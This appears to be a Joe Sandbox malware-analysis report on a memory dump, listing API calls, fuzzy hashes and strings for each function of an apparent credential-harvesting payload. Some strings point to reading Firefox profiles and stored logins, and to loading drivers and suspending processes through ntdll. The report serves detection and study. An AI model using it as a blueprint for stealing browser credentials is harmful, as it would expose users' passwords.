                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1043902810-0
                                                                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                          • API String ID: 3330709923-517860148
                                                                                                                                                                                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                          • String ID: logins$null
                                                                                                                                                                                                                          • API String ID: 3492182834-2163367763
                                                                                                                                                                                                                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                          • String ID: ---
                                                                                                                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1010922700-0
                                                                                                                                                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                                                          Strings
